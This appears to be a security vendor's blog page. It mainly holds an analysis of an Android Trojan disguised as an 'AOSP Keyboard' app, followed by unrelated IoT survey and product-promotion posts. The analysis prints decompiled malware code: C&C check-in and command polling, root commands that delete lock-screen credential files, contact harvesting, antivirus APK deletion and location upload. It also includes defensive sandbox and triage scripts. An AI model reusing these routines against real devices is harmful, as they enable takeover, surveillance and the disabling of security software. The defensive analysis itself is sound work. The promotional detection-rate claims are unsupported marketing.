A Trojan Disguised as a Keyboard App

A Trojan disguised as a keyboard app performs various operations on a user’s device

Trustlook Labs discovered a Trojan that takes advantage of the “su” command on a rooted Android device to perform malicious activities. The Trojan makes its way onto a device as a fake keyboard app named “AOSP Keyboard” under the package name com.android.classic, which mimics the genuine com.android.* system packages. Once the user launches the app, the malware removes its own launcher icon so that it no longer appears in the app drawer, while its background service keeps running.

The malware has the following characteristics:

  • MD5:
  • SHA256: 92bddb85ec6e94fc9dd4a0f62ec5a1fc7637c75f55e5b7507b74d29ecac065d5
  • Size: 275621 bytes
  • App name: AOSP Keyboard
  • Package name: com.android.classic

The package icon is:

[package icon image]

The work is done by a long-running service. On each start it checks connectivity, writes a marker file to a staging directory on external storage when built in debug mode, and runs its collection routine (doAll) whenever the screen turns on:

    public boolean isOnline() {
        // True only when there is an active, connected network; the service
        // has nothing to do while the device is offline.
        NetworkInfo netInfo = ((ConnectivityManager) getSystemService("connectivity")).getActiveNetworkInfo();
        if (netInfo == null || !netInfo.isConnected()) {
            return false;
        }
        return true;
    }

    public int onStartCommand(Intent intent, int flags, int startId) {
        try {
            threadPolicy();
            if (Constants.DEBUG) {
                // Debug builds log to /sdcard/Android/data/SystemLogs/Logger/,
                // the same staging area the malware later uses for stolen data.
                SH.run("echo 'started Service' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
            }
            setupAll();
            // Whoever starts the service passes "screen_state"; when it is
            // false (screen on) the service kicks off a fresh collection run.
            if (intent.getBooleanExtra("screen_state", false)) {
                screenOff();
            } else {
                screenOn();
            }
[...]
    private void screenOn() throws InterruptedException {
        if (Constants.DEBUG) {
            SH.run("echo 'Screen On' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        doAll();
    }

The malware first registers the device with its server, over cleartext HTTP:

    private void checkDevice() {
        if (Constants.DEBUG) {
            SH.run("echo 'check Device' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        new AsyncTask<Void, Void, Void>() {
            protected Void doInBackground(Void... params) {
                // Deprecated Apache HttpClient over plain HTTP: the check-in is
                // visible to, and spoofable by, anyone on the network path.
                HttpClient httpClient = new DefaultHttpClient();
                String man2 = Build.MANUFACTURER.replaceAll("\\s+", "");
                // replace(), not replaceAll(): this looks for the literal text
                // "\s+" and therefore strips no whitespace at all.
                String rel = VERSION.RELEASE.replace("\\s+", "");
                HttpPost httpPost = new HttpPost("http://www.asds.esy.es/androidcp/device/checkdevice");
                // "did" is manufacturer + OS version, so it is not unique per
                // device; the per-install identity comes from "name" and
                // "number" (a field the decompiled service calls "random").
                BasicNameValuePair usernameBasicNameValuePair = new BasicNameValuePair("did", new StringBuilder(String.valueOf(man2)).append(rel).toString());
                BasicNameValuePair usernameValuePair = new BasicNameValuePair("name", DEBUGSERVICE.name);
                BasicNameValuePair numberValuePair = new BasicNameValuePair("number", DEBUGSERVICE.random);
                List<NameValuePair> nameValuePairList = new ArrayList();
                nameValuePairList.add(usernameBasicNameValuePair);
                nameValuePairList.add(usernameValuePair);
                nameValuePairList.add(numberValuePair);
                try {
                    httpPost.setEntity(new UrlEncodedFormEntity(nameValuePairList));
                    try {
                        // The response body is ignored: registration is fire-and-forget.
                        httpClient.execute(httpPost);
                    } catch (ClientProtocolException cpe) {
                        cpe.printStackTrace();
[...]
The malware then polls the C&C server at http://www.asds.esy.es (again over cleartext HTTP) for command instructions, sending the same three identifiers, and dispatches the reply to one of two activities:

    private void checkCMD() {
        if (Constants.DEBUG) {
            SH.run("echo 'check CMD' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        new AsyncTask<Void, Void, Void>() {
            protected Void doInBackground(Void... params) {
                HttpClient httpClient = new DefaultHttpClient();
                String rel = VERSION.RELEASE.replace("\\s+", "");
                String man2 = Build.MANUFACTURER.replaceAll("\\s+", "");
                HttpPost httpPost = new HttpPost("http://www.asds.esy.es/androidcp/device/getcommand");
                BasicNameValuePair usernameBasicNameValuePair = new BasicNameValuePair("did", new StringBuilder(String.valueOf(man2)).append(rel).toString());
                BasicNameValuePair usernameValuePair = new BasicNameValuePair("name", DEBUGSERVICE.name);
                BasicNameValuePair numberValuePair = new BasicNameValuePair("number", DEBUGSERVICE.random);
                List<NameValuePair> nameValuePairList = new ArrayList();
                nameValuePairList.add(usernameBasicNameValuePair);
                nameValuePairList.add(usernameValuePair);
                nameValuePairList.add(numberValuePair);
                try {
                    httpPost.setEntity(new UrlEncodedFormEntity(nameValuePairList));
                    try {
                        // The command is the raw, trimmed response body.
                        String response = DEBUGSERVICE.this.entityToString(httpClient.execute(httpPost).getEntity()).trim();
                        for (String element : DEBUGSERVICE.codeList) {
                            Intent intent;
                            // Substring match, so an empty body "matches" the first
                            // entry; a known command is handed to the DEBUG activity.
                            if (element.contains(response)) {
                                intent = new Intent(DEBUGSERVICE.this, DEBUG.class);
                                intent.putExtra("command", response);
                                // 268435456 == Intent.FLAG_ACTIVITY_NEW_TASK, required
                                // to start an Activity from a Service context.
                                intent.addFlags(268435456);
                                DEBUGSERVICE.this.startActivity(intent);
                                return null;
                            }
                            // Every non-matching entry launches the Response activity,
                            // so an unknown command starts it once per list entry.
                            intent = new Intent(DEBUGSERVICE.this, Response.class);
                            intent.putExtra("command", response);
                            intent.addFlags(268435456);
                            DEBUGSERVICE.this.startActivity(intent);
                        }
[...]
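The check-in and command-poll exchange above is easy to emulate, which is how an analyst drives the sample in an isolated sandbox without letting it reach the real server. The following fake C&C is an added example, not the malware's server and not Trustlook code: the two endpoint paths and the form fields (did, name, number) are taken from the decompiled checkDevice()/checkCMD(), while the listen address and the command tokens in CODE_LIST are assumptions, since the post does not reproduce DEBUGSERVICE.codeList. The dispatch() helper mirrors the client-side loop so that its matching quirks can be checked offline.

```python
"""Fake C&C for driving the sample in an isolated sandbox (added example)."""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Placeholder command tokens (constructed); substitute the real codeList
# strings once they have been recovered from the sample.
CODE_LIST = ["getcontacts", "getsms", "gps", "wipe"]

REGISTRY = {}   # did -> {"name": ..., "number": ...} seen on /checkdevice
QUEUE = {}      # did -> command string to hand out on the next /getcommand


def device_id(manufacturer, release):
    """Rebuild the sample's "did" so queued commands match its check-ins.
    MANUFACTURER goes through replaceAll("\\s+", "") (a regex), but RELEASE
    goes through replace("\\s+", ""), a literal match that strips nothing;
    both behaviours are mirrored here on purpose."""
    return re.sub(r"\s+", "", manufacturer) + release.replace("\\s+", "")


def parse_form(body):
    """Decode the UrlEncodedFormEntity body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_checkdevice(form):
    """Registration. The sample discards the response, so return nothing."""
    REGISTRY[form.get("did", "")] = {"name": form.get("name"),
                                     "number": form.get("number")}
    return ""


def handle_getcommand(form):
    """Hand out one queued command; empty body when nothing is pending."""
    return QUEUE.pop(form.get("did", ""), "")


def dispatch(response, code_list=CODE_LIST):
    """Mirror the client loop in checkCMD(): for each codeList entry, if
    entry.contains(response) start DEBUG with the command and stop, else
    start Response for that entry and keep going. Two quirks to expect:
    an empty body matches entry 0 (every string contains ""), and an
    unknown command launches Response once per entry."""
    actions = []
    for i, entry in enumerate(code_list):
        if response in entry:
            actions.append(("DEBUG", i))
            return actions
        actions.append(("Response", i))
    return actions


class C2Handler(BaseHTTPRequestHandler):
    ROUTES = {"/androidcp/device/checkdevice": handle_checkdevice,
              "/androidcp/device/getcommand": handle_getcommand}

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_form(self.rfile.read(length).decode("utf-8", "replace"))
        handler = self.ROUTES.get(self.path)
        body = handler(form) if handler else ""
        self.send_response(200 if handler else 404)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())
        self.log_message("%s did=%s -> %r", self.path, form.get("did"), body)


if __name__ == "__main__":
    # Point www.asds.esy.es at this host inside the sandbox (hosts file or a
    # DNS sinkhole) and queue a command for the device under test.
    QUEUE[device_id("samsung", "5.1.1")] = CODE_LIST[0]
    HTTPServer(("127.0.0.1", 8080), C2Handler).serve_forever()
```

Because the sample matches commands by substring, a queued token only has to be contained in the real codeList entry; the server logs every check-in, so the did/name/number triple the sample actually sends is visible on the first poll.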

The following are some of the commands supported by the malware (the full set lives in the DEBUGSERVICE.codeList array; the antivirus-removal command, for example, is entry 38):

  • wipe device
  • wipe external storage
  • remove screen lock patterns/pins/codes
  • install apk
  • take screen snapshot
  • get list of packages
  • record audio
  • take picture from back camera
  • take picture from front camera
  • send file
  • disable adb on the device
  • get contacts
  • get SMS
  • get call logs
  • get browser bookmarks
  • get location information
  • delete antivirus products

The following code removes the screen lock. Running as root through “su” on the rooted device, the malware deletes the lock-credential files under /data/system and then reboots, so the device comes back without a pattern, PIN or password:

    // The space after the comma makes these three calls malformed: mount sees
    // the options "rw," and a device named "remount", so they fail. That is
    // presumably why the same remounts are repeated below with correct syntax.
    SU.run("mount -o rw, remount /data");
    SU.run("mount -o rw, remount /data/system");
    SU.run("mount -o rw, remount /data/system/gesture.key");
    // None of the remount/chmod steps are needed once the commands run as root
    // (/data is normally mounted read-write already); their lasting effect is
    // to leave /data and /data/system world-writable after the attack.
    remount = Runtime.getRuntime().exec(new String[]{"su", "-c", "mount -o rw,remount '/data/'"});
    remount1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "mount -o rw,remount /data/system/"});
    pr1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "chmod 0777  /data/"});
    pr2 = Runtime.getRuntime().exec(new String[]{"su", "-c", "chmod 0777  /data/system"});
    // gesture.key (pattern) holds the credential on older releases,
    // gatekeeper.*.key on Android 6.0 and later; the *.key glob at the end
    // removes whichever files are present.
    Process unlock = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gesture.key"});
    Process unlock1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gatekeeper.password.key"});
    Process unlock2 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gatekeeper.pattern.key"});
    Process unlock3 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/*.key"});
    remount.waitFor();
    remount1.waitFor();
    pr1.waitFor();
    pr2.waitFor();
    unlock.waitFor();
    unlock1.waitFor();
    unlock2.waitFor();
    unlock3.waitFor();
    SU.run("rm -rf /data/system/*.key");
    // Reboot so the lock screen is rebuilt without a credential.
    SU.run("reboot");

The following code collects the contacts. It needs no root: with the ordinary READ_CONTACTS permission it renders every contact as a vCard and appends the cards to a single file in the malware's staging directory on external storage:

    // <external storage>/Android/data/SystemLogs/Contacts/<MODEL>_Contacts_<date>.vcf
    String vfile = Build.MODEL + "_Contacts_" + date + ".vcf";
    File file = new File(new StringBuilder(String.valueOf(Environment.getExternalStorageDirectory().getPath())).append("/Android/data/SystemLogs/Contacts/").toString());
    file.mkdirs();
    String path = file.getAbsolutePath() + "/" + vfile;
    // Iterates phone-number rows rather than contacts, so contacts without a
    // number are skipped and a contact with several numbers is exported once
    // per number.
    Cursor phones = getContentResolver().query(Phone.CONTENT_URI, null, null, null, null);
    phones.moveToFirst();
    for (int i = 0; i < phones.getCount(); i++) {
        try {
            // Appending the row's lookup key to CONTENT_VCARD_URI makes the
            // contacts provider serialise that contact as a vCard.
            AssetFileDescriptor fd = getContentResolver().openAssetFileDescriptor(Uri.withAppendedPath(Contacts.CONTENT_VCARD_URI, phones.getString(phones.getColumnIndex("lookup"))), "r");
            byte[] buf = new byte[((int) fd.getDeclaredLength())];
            fd.createInputStream().read(buf);
            String str = new String(buf);
            // Opened in append mode, so all cards land back-to-back in one
            // .vcf file; neither stream is ever closed.
            new FileOutputStream(path, true).write(str.toString().getBytes());
            phones.moveToNext();
        } catch (Exception e1) {
            e1.printStackTrace();
        }
    }
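When scoping an incident involving this sample, the first question is what the contacts command actually captured. The script below is an added example, not code from the post: it parses a pulled copy of the staging directory described above (<external storage>/Android/data/SystemLogs/Contacts/), taking the device model and date from the <MODEL>_Contacts_<date>.vcf file name and counting and naming the contacts inside. The vCard content in SAMPLE_VCF is constructed for the demo.

```python
"""Scope what the contacts command captured (added example)."""
import re
from pathlib import Path

# File-name pattern used by the sample: Build.MODEL + "_Contacts_" + date + ".vcf"
NAME_RE = re.compile(r"^(?P<model>.+)_Contacts_(?P<date>.+)\.vcf$")

# Constructed sample of the file layout: cards written back-to-back with no
# separator, as the sample's appending FileOutputStream produces.
SAMPLE_VCF = (
    "BEGIN:VCARD\nVERSION:2.1\nN:Doe;Jane;;;\nFN:Jane Doe\n"
    "TEL;CELL:+15550100\nEND:VCARD\n"
    "BEGIN:VCARD\nVERSION:2.1\nN:Roe;Richard;;;\nFN:Richard Roe\n"
    "TEL;HOME:+15550199\nTEL;CELL:+15550111\nEND:VCARD\n"
)


def parse_vcards(text):
    """Split a concatenated vCard stream on BEGIN:VCARD (there are no blank
    lines between cards) and pull the FN and TEL properties from each.
    Property parameters such as TEL;CELL are dropped; vCard 2.1 folding and
    quoted-printable encoding are not unwrapped, which is fine for counting."""
    cards = []
    for chunk in re.split(r"(?=BEGIN:VCARD)", text):
        if "END:VCARD" not in chunk:
            continue  # leading empty chunk, or a final card cut off mid-write
        card = {"fn": None, "tel": []}
        for line in chunk.splitlines():
            key, _, value = line.partition(":")
            key = key.split(";", 1)[0].upper()
            if key == "FN":
                card["fn"] = value.strip()
            elif key == "TEL":
                card["tel"].append(value.strip())
        cards.append(card)
    return cards


def summarise(filename, text):
    """One dump file: model and date from the name, contacts from the body.
    Repeated names are expected: the sample exports a contact once per
    phone number."""
    m = NAME_RE.match(filename)
    cards = parse_vcards(text)
    return {"file": filename,
            "model": m["model"] if m else None,
            "date": m["date"] if m else None,
            "contacts": len(cards),
            "names": [c["fn"] for c in cards]}


def inventory(directory):
    """Summarise every .vcf in a pulled copy of the staging directory, e.g.
    after `adb pull /sdcard/Android/data/SystemLogs/Contacts ./Contacts`."""
    return [summarise(p.name, p.read_text(errors="replace"))
            for p in sorted(Path(directory).glob("*.vcf"))]


if __name__ == "__main__":
    import sys
    for entry in inventory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(entry)
```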

Command 38 in the malware's command list deletes installed antivirus and security apps. It does not uninstall them through the package manager: running as root, it removes their APK directories from /data/app (the trailing glob matches the /data/app/<package>-N/ layout), after which the apps are gone the next time the package manager rescans. Only user-installed apps live in /data/app, so a security product preloaded in /system is untouched:

                } else if (this.commands.equals(DEBUGSERVICE.codeList[38])) {
                    // Same malformed "rw, remount" calls as in the lock-removal
                    // code, repeated with correct syntax; all redundant as root.
                    SU.run("mount -o rw, remount /data");
                    SU.run("mount -o rw, remount /data/app");
                    SU.run("mount -o rw,remount '/data/'");
                    SU.run("mount -o rw,remount '/data/app/'");
                    // Leaves /data and /data/app world-writable afterwards.
                    SU.run("chmod 0777 '/data/'");
                    SU.run("chmod 0777 '/data/app/'");
                    // Hard-coded package prefixes: Clean Master, Avast, Qihoo 360,
                    // CM Security, Avira, Norton, McAfee, ESET, Quick Heal,
                    // Kaspersky, K7, AVG, Lookout, Malwarebytes, Bitdefender, etc.
                    SU.run("rm -rf /data/app/com.cleanmaster.mguard*");
                    SU.run("rm -rf  /data/app/com.avast.android.mobilesecurity*");
                    SU.run("rm -rf /data/app/com.qihoo.security*");
                    SU.run("rm -rf  /data/app/com.cleanmaster.security*");
                    SU.run("rm -rf  /data/app/com.zrgiu.antivirus*");
                    SU.run("rm -rf  /data/app/com.avira.android*");
                    SU.run("rm -rf  /data/app/com.symantec.mobilesecurity*");
                    SU.run("rm -rf  /data/app/com.wsandroid.suite*");
                    SU.run("rm -rf  /data/app/com.eset.ems2.gp*");
                    SU.run("rm -rf  /data/app/com.quickheal.platform*");
                    SU.run("rm -rf  /data/app/com.kms.free*");
                    SU.run("rm -rf  /data/app/com.cmsecurity.lite*");
                    SU.run("rm -rf  /data/app/com.k7computing.android.security*");
                    SU.run("rm -rf  /data/app/org.antivirus*");
                    SU.run("rm -rf  /data/app/com.androhelm.antivirus.free2*");
                    SU.run("rm -rf  /data/app/com.lookout*");
                    SU.run("rm -rf  /data/app/org.malwarebytes.antimalware*");
                    SU.run("rm -rf  /data/app/com.cleanmaster.security.stubborntrjkiller*");
                    SU.run("rm -rf  /data/app/com.bitdefender.antivirus*");
                    SU.run("rm -rf  /data/app/com.cmcm.lite*");
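Both of the “su”-based routines above (lock-credential deletion and antivirus removal) leave checkable traces on the device: the sample's own package, the security apps it targets, the credential files under /data/system, and the 0777 modes it leaves behind. The triage script below is an added example, not code from the post or from Trustlook. Its parsers take raw command output as text so they can be exercised offline; collect_from_device() shows how to feed them from a live device and assumes that adb is on the PATH and that `adb root` works (the device has to be rooted for this sample to function at all) and that the device's toybox `stat` supports `-c '%a %n'`.

```python
"""Triage helpers for the su-based tampering described above (added example)."""
import subprocess

SAMPLE_PKG = "com.android.classic"   # package name from the IOC list above

# Lock-credential files the sample deletes under /data/system. Which ones
# exist depends on the release: gesture.key / password.key on older Android,
# gatekeeper.pattern.key / gatekeeper.password.key on Android 6.0 and later.
LOCK_FILES = {"gesture.key", "password.key",
              "gatekeeper.pattern.key", "gatekeeper.password.key"}

# Package prefixes hit by `rm -rf /data/app/<prefix>*` in command 38.
AV_TARGETS = ["com.cleanmaster.mguard", "com.avast.android.mobilesecurity",
              "com.qihoo.security", "com.cleanmaster.security",
              "com.zrgiu.antivirus", "com.avira.android",
              "com.symantec.mobilesecurity", "com.wsandroid.suite",
              "com.eset.ems2.gp", "com.quickheal.platform", "com.kms.free",
              "com.cmsecurity.lite", "com.k7computing.android.security",
              "org.antivirus", "com.androhelm.antivirus.free2", "com.lookout",
              "org.malwarebytes.antimalware", "com.bitdefender.antivirus",
              "com.cmcm.lite"]


def packages(pm_output):
    """Parse `pm list packages` lines of the form 'package:<name>'."""
    return {ln.split(":", 1)[1].strip() for ln in pm_output.splitlines()
            if ln.startswith("package:")}


def targeted_av_installed(pm_output):
    """Security apps still on the device that the sample would try to delete."""
    pkgs = packages(pm_output)
    return sorted(p for p in pkgs if any(p.startswith(t) for t in AV_TARGETS))


def lock_files_present(ls_output):
    """From `ls /data/system`: which credential files still exist. If the
    user has a lock configured and this comes back empty, they were removed."""
    return LOCK_FILES & {ln.strip() for ln in ls_output.splitlines()}


def world_writable(stat_output):
    """From `stat -c '%a %n' /data /data/system`: paths with the world-write
    bit set. Stock values are 771 and 775; the sample's chmod 0777 is never
    reverted, so a 777 here is a lasting indicator."""
    bad = []
    for ln in stat_output.splitlines():
        mode, _, path = ln.strip().partition(" ")
        if mode and int(mode, 8) & 0o002:
            bad.append(path)
    return bad


def triage(pm_output, ls_output, stat_output):
    """Combine the checks into one report."""
    return {"sample_installed": SAMPLE_PKG in packages(pm_output),
            "targeted_av": targeted_av_installed(pm_output),
            "lock_files": sorted(lock_files_present(ls_output)),
            "world_writable": world_writable(stat_output)}


def collect_from_device():
    """Live collection over adb; /data/system needs `adb root` to have succeeded."""
    def sh(cmd):
        return subprocess.run(["adb", "shell", cmd], capture_output=True,
                              text=True, check=True).stdout
    return triage(sh("pm list packages"), sh("ls /data/system"),
                  sh("stat -c '%a %n' /data /data/system"))


if __name__ == "__main__":
    print(collect_from_device())
```

A device that shows the sample package, no lock-credential files despite a configured lock, and a 777 /data/system has almost certainly run the lock-removal command; missing security apps that the owner remembers installing point at command 38.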

The malware uses the following function to get location information. It first broadcasts android.location.GPS_ENABLED_CHANGE with enabled=true, an old trick that switched GPS on through the power-control widget without user interaction on early Android releases (later releases ignore it), then reads the last known fix and uploads it with the same name/random identifiers used at check-in:

    public Location getLocation() {
        try {
            this.locationManager = (LocationManager) this.mContext.getSystemService("location");
            this.isGPSEnabled = this.locationManager.isProviderEnabled("gps");
            this.isNetworkEnabled = this.locationManager.isProviderEnabled("network");
            // Attempt to force GPS on; harmless on releases that dropped the
            // widget behaviour, effective only on very old ones.
            Intent intent = new Intent("android.location.GPS_ENABLED_CHANGE");
            intent.putExtra("enabled", true);
            sendBroadcast(intent);
            if (this.isGPSEnabled || this.isNetworkEnabled) {
                this.canGetLocation = true;
                // The network (cell/Wi-Fi) provider is tried first: it is fast
                // and works indoors, and precision is not the attacker's concern.
                if (this.isNetworkEnabled) {
                    this.locationManager.requestLocationUpdates("network", MIN_TIME_BW_UPDATES, 10.0f, this);
                    if (this.locationManager != null) {
                        this.location = this.locationManager.getLastKnownLocation("network");
                        if (this.location != null) {
                            this.latitude = this.location.getLatitude();
                            this.longitude = this.location.getLongitude();
                        }
                    }
                }
                // GPS only as a fallback when the network provider had no fix.
                if (this.isGPSEnabled && this.location == null) {
                    this.locationManager.requestLocationUpdates("gps", MIN_TIME_BW_UPDATES, 10.0f, this);
                    if (this.locationManager != null) {
                        this.location = this.locationManager.getLastKnownLocation("gps");
                        if (this.location != null) {
                            this.latitude = this.location.getLatitude();
                            this.longitude = this.location.getLongitude();
                        }
                    }
                }
                // getLastKnownLocation may be stale or null; with no fix at all
                // the fields keep their initial values and are uploaded anyway.
                String finalOutput = this.latitude + "|" + this.longitude;
                new Sender().execute(new String[]{"gps", DEBUGSERVICE.name, DEBUGSERVICE.random, finalOutput});
            }

Summary
“Rooting” a device can be very dangerous. It gives the user administrative access to the device, and with it every app that can obtain “su” gets the same access. The drawbacks are obvious: rooting typically voids the manufacturer's warranty, and malware gains permissions and freedom it could never get through Android's normal permission model. Everything in the “su”-based routines above (removing the screen lock, deleting security apps from /data/app) fails on an unrooted device; the contacts and location routines, however, rely only on ordinary app permissions and work without root.

Trustlook was able to gather deep insights into the behavior of this keyboard app. Trustlook's anti-threat platform can effectively protect users against this threat.

Survey Reveals IoT Security is Falling Short

Trustlook has released the findings from an IoT security survey it sent in September 2017. Some responses validated existing beliefs, while others were troubling in terms of how the IoT is secured and understood. For instance, 54 percent of IoT device owners do not use a third-party security tool to protect their devices from outside threats. In addition, more than one-third (35 percent) do not change the default password on their devices, leaving them vulnerable to attacks.

The proliferation of IoT devices in 2017 has been staggering, with 8.4 billion devices currently in use, and a total of 25 billion devices projected by 2020. As the use of these devices continues to increase, so do the associated risks. By 2020, it is estimated that 25% of cyber attacks will target IoT devices.

In the past year, there have been a few notable IoT attacks. In August 2017, researchers showed that an attacker with physical access to a vulnerable Amazon Echo could gain root and add commands that secretly capture the raw microphone input. And the Mirai botnet of fall 2016, built from compromised IoT devices, disrupted access to large parts of the Internet through a DDoS attack on the DNS provider Dyn.

Some of the findings from the survey include:
▪ 41% own an IoT device, such as a smart refrigerator or fitness tracker
▪ 54% of IoT device owners do not use a third-party security tool
▪ 35% of IoT device owners do not change their default password
▪ 17% know of Mirai, the IoT botnet that disrupted large parts of the Internet in fall 2016
▪ 22% are aware of the projection that there will be 25 billion IoT devices by the year 2020

To view an infographic of the survey findings, please go here. For more information on Trustlook, please visit http://www.trustlook.com.


Take our IoT Security Survey for a chance to win $50

The penetration of the IoT (Internet of Things) into our personal and professional lives is continuing to grow at an incredible pace. The benefits are numerous, but there are also risks, with the biggest risk being security. All of these devices increase the attack surface and present new opportunities for hackers to invade our lives.

Trustlook is looking to gather additional information and feedback on what impact the IoT has had on consumers, and how consumers are approaching security with these new devices.

We would greatly appreciate you taking the time to answer a few short questions regarding your IoT experience. Your feedback is important to us. By taking the survey, you will be eligible to win a $50 Amazon.com Gift Card. The winner will be selected on 9/17/17.

We thank you in advance for your feedback. You can take the survey here.


Trustlook Selected as 10 Best Security Service Providers of 2017

Trustlook has been selected by Industry Era magazine as one of the 10 Best Security Service Providers of 2017. This prestigious list honors the most promising technology ventures from across the security landscape. This year’s list includes companies in cloud, network, and IoT security.

“Trustlook is very proud to receive this recognition,” says Allan Zhang, CEO and co-founder of Trustlook. “This is testament to all the hard work we’ve put into our security products over the past year.”

Trustlook builds all of its security products, mobile and IoT alike, on Artificial Intelligence (AI), using the data they receive to improve performance rapidly. It also relies on product breadth to stand out: it has products for consumers, app developers, OEMs, systems integrators, and large enterprises, protecting mobile phones, network appliances, and IoT devices. Almost anyone looking to build security into an app or computing device can benefit from its technology.

To read the article, please go here. To learn more about Trustlook or to schedule a demo, please visit www.trustlook.com.


Is Your Ransomware Security Solution SAFE?

Ransomware security solutions claim to be many things. Some claim to be fast. Some say they include artificial intelligence (AI). Some point out their accuracy. And others try to illustrate their effectiveness. But only one ransomware security solution can check all the boxes. Only one is smart, accurate, fast, and effective. Only one is, shall we say, SAFE. It’s Trustlook SECUREai Core Ransomware. Let’s look further.

It’s Smart
Trustlook’s proprietary AI engine is built on an advanced machine learning foundation that is constantly improving. Millions of data points have been analyzed to build this intelligent engine.

It’s Accurate
Trustlook’s ransomware detection rates are consistently over 99%, with extremely low false positives of less than 1%.

It’s Fast
Trustlook’s ransomware detection engine processes dozens of files per second, without weighing down the network.

It’s Effective
Trustlook blocks new ransomware threats before files and data are encrypted. Threats are blocked in real-time, eliminating the cost and disruption associated with tackling threats after they’ve already penetrated the network.

Don’t settle for an average ransomware security solution. Ransomware has been identified as the biggest cyber threat of 2017 by the U.S. Department of Justice, and is expected to cost businesses and individuals millions in the coming years.

Trustlook’s ransomware detection is built into its SECUREai Core platform. SECUREai Core provides an additional layer of protection for network appliance makers and cloud service providers. To learn more about Trustlook’s ransomware solution please visit http://www.trustlook.com.


Could the Amazon Echo hack have been prevented with proper IoT security?

IoT devices are becoming more popular in homes, and so too are these devices’ security vulnerabilities. The latest concerning example is the hack of the Amazon Echo, the smart speaker capable of voice interaction, music playback, making to-do lists, setting alarms, streaming podcasts, and more.

The hack, which requires physical access to a vulnerable Echo to gain root and add commands that secretly capture the raw microphone input and send it to an attacker-controlled computer, shows just how vulnerable consumers can be in the privacy of their own home. Moreover, it highlights the need for consumers to remain vigilant about the products they install, and for IoT developers to subject the smart devices they build to more rigorous security assessments.

It’s clear from the Amazon Echo hack, as well as from past incidents such as Stuxnet and the Target data breach, that all the network and perimeter-based security mechanisms in the world are no match for human error (e.g. phishing) or “evil-maid” attacks, in which a device is compromised because someone has physical access to it. Devices need an additional layer of security that monitors behavior inside the device.

Enter Trustlook SECUREai IoT – The Guard Inside the Castle
Trustlook SECUREai IoT revolutionizes IoT security with a custom, embeddable engine built on artificial intelligence. SECUREai IoT is a device-behavior-based solution that detects threats that existing perimeter and network-based products fail to stop. SECUREai IoT works at the device level, so it protects an IoT device from the inside. Its device driver monitors hundreds of system calls and network resources to detect anomalies.

The solution assumes that an attacker already has root access, and monitors the device behavior that happens after root access. Because “root” is the starting point, SECUREai IoT can catch malicious activity that has made it past other forms of protection.

In the case of the Amazon Echo hack, SECUREai IoT would have quickly identified the raw microphone data being streamed over TCP/IP to a remote host. Its fine-grained kernel-level monitoring of system calls, network and device resources can distinguish normal from abnormal operating behavior.

To learn more about SECUREai IoT, please download the datasheet or contact bd@trustlook.com.


Download the latest Trustlook cyber security product information

Do you like reading about the latest Artificial Intelligence solutions in cyber security? If so, you are in luck. Trustlook has security solutions for network appliance makers, IoT developers, mobile device manufacturers, and more.

Take a moment and check out the following datasheets, whitepapers, and videos that provide more details on the innovative security solutions that Trustlook is bringing to customers across the globe.

Quick Reading 2-Page Datasheets
SECUREai IoT
SECUREai Core (for network appliance makers)
SECUREai SaaS (for app stores)

Technical Whitepapers
SECUREai Overview
SECUREai Mobile Defend

General Brochure
SECUREai Overview

Video